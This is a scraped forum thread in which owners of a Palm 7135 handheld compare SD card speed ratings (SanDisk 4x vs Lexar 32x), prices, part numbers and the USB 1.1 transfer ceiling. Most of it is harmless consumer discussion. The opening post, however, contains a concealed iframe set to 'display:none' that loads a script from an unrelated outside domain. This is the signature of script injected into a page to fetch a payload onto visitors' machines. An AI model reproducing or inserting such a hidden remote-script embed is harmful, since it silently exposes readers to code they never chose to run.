+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Thread: SD Cards

SD Cards

Haven't seen this anywhere so I thought I would post it...

Just bought a Lexar 256MB SD Card with a little red cirlce that says 32x...after a little research on the web I realized this stands for the transfer speed.

I had assumed SD Card technology was all the same for transfer speeds, but it's not.

I did some checking on my SanDisk 256MB SD Card and found out it was only 4x. After putting this to the test, I've noticed a HUGE speed improvement.

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Cocked, Locked & Loaded RedDog205's Avatar
    I've never seen any numbers but I do know the SanDisk cards are some of the slowest I've used. How much did you pay for the Lexar?
    Nothing is idiot proof. There's always a smarter Idiot.
    http://www.danasoft.com/sig/reddog205.jpg

THe guy at Future Shop said they just got these in. I noticed the older Lexar didn't have this, so I'm assuming they aren't 32x either.

I paid $119.00 CDN for the card - same price as the SanDisk card

Very cool, thanks. Would you have a part number handy?

Not really a part number, but here is the info off the card...

LEXAR mEDIA 256mb
    32X High Speed

D000 BK3HE 003444
    256MB Made in Japan

Great, thanks again. Found some at Computers 4 sure for $88 US. 32x SD 256MB...whoohooo!

Computers4Sure
    Part#:S2674301 Mfr#:SD256-32-266 Mfr:Lexar Media

Is there any evidence the the 7135 works better with a faster card? I don't much care if transferring a 5 megabyte song from my computer takes 10 seconds or 2 seconds, but I would like to be able to play 192K encoded mp3's without skipping.

St

Well that's more a factor of the Dragonball 33MHz processor than the SD card speed.

My point exactly. So what exactly does a 32x SD card do for me as a 7135 owner that makes it worth paying twice the price of a 4X card?

St

Originally posted by RedDog205
    Well that's more a factor of the Dragonball 33MHz processor than the SD card speed.

Getting the MP3's (or whatever) to the SD card via the reader faster. Same reason people buy Hard Drives with faster transfer rates.

Originally posted by RedDog205
    Great, thanks again. Found some at Computers 4 sure for $88 US. 32x SD 256MB...whoohooo!

Computers4Sure
    Part#:S2674301 Mfr#:SD256-32-266 Mfr:Lexar Media
    It's on backorder (no date supplied) but I ordered anyway. I suppose I can wait...

To answer your question...

I noticed a difference between the cards during the loading. PhotoView would sometime freeze when loading pictures using the SanDisk card (only load 1/4 to 1/2 the picture). When I switch over to the Lexar card, the picture load instantly.

I also noticed a difference in MP3's. The default MP3 player seems to load faster and I think the songs transfer over faster (didn't really give this a big test as it still takes forever).

pzc
    Has anyone actually tested the load time between different SD technologies/brands? I’m talking about the direct transfer to the card with a USB device – not direct transfer via 7135 app. I’m trying to decide if a Lexar 32 is worth the price difference. I only have one type of a card so I can’t measure the difference. Are we talking about 10%, 50%, 100%?

Thanks!

Hogh-Speed SANDISK SD cards

The speed of the SD cards really come into play when used with digital cameras. With the slower, current-generation SD cards (and CF cards, too, for that matter), photographers often miss getting pictures because the startup and, especially, recycling times between shots is dependent upon the speed of the memory card used: before the next shot is taken the previous shot must be processed and moved to the memory card.

Interestingly enough, the new Kyocera Finecam S5R is is one the first digital cameras that can take "real time" and continuous photographs when using one of the newer, high-speed SD cards.

And just so no one thinks SANDisk falling behind on the job, they are releasing their own high-speed SD and CF cards: http://www.sandisk.com/pressrelease/20030828b.htm

Indeed, the new SANDisk should be about twice as fast as the current 32x Lexar SD cards. The SANDisk SD cards have a write speed of 9 MB/second while the 32x Lexar SD cards have a write speed of 4.8 MB/second.

pzc

Re: Hogh-Speed SANDISK SD cards

Originally posted by William
    The speed of the SD cards really come into play when used with digital cameras.
    Yes, but writing speed is writing speed. I'm wondering how much time I can save when using a USB 512 MB card writer for making MP3 copy for my 7135.

My 256 Lexar (model # SD256, made in Japan) takes about 8 minutes for a full load. Does that mean that a 512 Lexar will take about 16 minutes for a full load (twice the load at the same speed), whereas 512 X 32 Lexar will take about 8 minutes (twice the load but twice the speed)?

Thanks

Re: Re: Hogh-Speed SANDISK SD cards

Originally posted by pzc
    Yes, but writing speed is writing speed. I'm wondering how much time I can save when using a USB 512 MB card writer for making MP3 copy for my 7135.

My 256 Lexar (model # SD256, made in Japan) takes about 8 minutes for a full load. Does that mean that a 512 Lexar will take about 16 minutes for a full load (twice the load at the same speed), whereas 512 X 32 Lexar will take about 8 minutes (twice the load but twice the speed)?

Thanks
    Agreed. Sorry, I probably got a little off topic in my original post.

It should be faster but the speed improvment is not linear. To be honest, for me -- and I emphasize this only because it is a personal opinion -- I don't think the additional price is worth the little bit of time saved. But again, that is my personal opinion; other users' preferences (and requirements) will vary. For me, I buy the faster cards for my digital camera (am I getting off topic again?) and just so happen to use them for my 7135.

Re: Re: Re: Hogh-Speed SANDISK SD cards

Originally posted by William
    Agreed. Sorry, I probably got a little off topic in my original post.

It should be faster but the speed improvment is not linear. To be honest, for me -- and I emphasize this only because it is a personal opinion -- I don't think the additional price is worth the little bit of time saved...
    I don't think you are off topic, you're pointing out that there are applications where extra speed is important--I agree with you that those of us with 7135's as our only or primary SD flashcard use don't get enough benefit from fast card to make them worth the money.

However, if you are thinking towards the future, where you might be getting an SD card camera or some next-generation phone that can take advantage of the speed somehow, your mileage may vary.

Also, note that those of us with USB 1.1 SD card readers won't be able to see *any* improvement for cards faster than 1.4 MegaBytes per second, as this is the maximum USB 1.1 transfer rate (11 megabits per second). You'll need a USB 2.0 or Firewire reader to take advantage of anything much above 12X, I think it is.

St

Re: Re: Re: Re: Hogh-Speed SANDISK SD cards

Originally posted by swelch

Also, note that those of us with USB 1.1 SD card readers won't be able to see *any* improvement for cards faster than 1.4 MegaBytes per second, as this is the maximum USB 1.1 transfer rate (11 megabits per second). You'll need a USB 2.0 or Firewire reader to take advantage of anything much above 12X, I think it is.

You hit it right on the nose...

I have tried a transfer test with my Sandisk 256MB and my new Lexar 256MB 32x card. With my USB 1.1 computer I noticed no difference, but with my USB 2.0 laptop I noticed a difference between the cards.

William - not sure where you found the speed of the Lexar 32x cards, but if you could provide link

Re: Re: Re: Re: Re: Hogh-Speed SANDISK SD cards

Originally posted by Islander
    You hit it right on the nose...

I have tried a transfer test with my Sandisk 256MB and my new Lexar 256MB 32x card. With my USB 1.1 computer I noticed no difference, but with my USB 2.0 laptop I noticed a difference between the cards.
    I use a SD PC Card adaptor for my HP laptop, not a USB SD reader, so I don't see the USB 1.1/2.0 speed limits. There is a big difference in xfer speed between the Sandisk 4x card an the Lexar 32x card in this configuration.

Re: Re: Re: Re: Re: Hogh-Speed SANDISK SD cards

Originally posted by Islander
    I get the impression that these speed differences/tests are primarily write comparisons. Anybody know the difference for only the read times.
    -Quick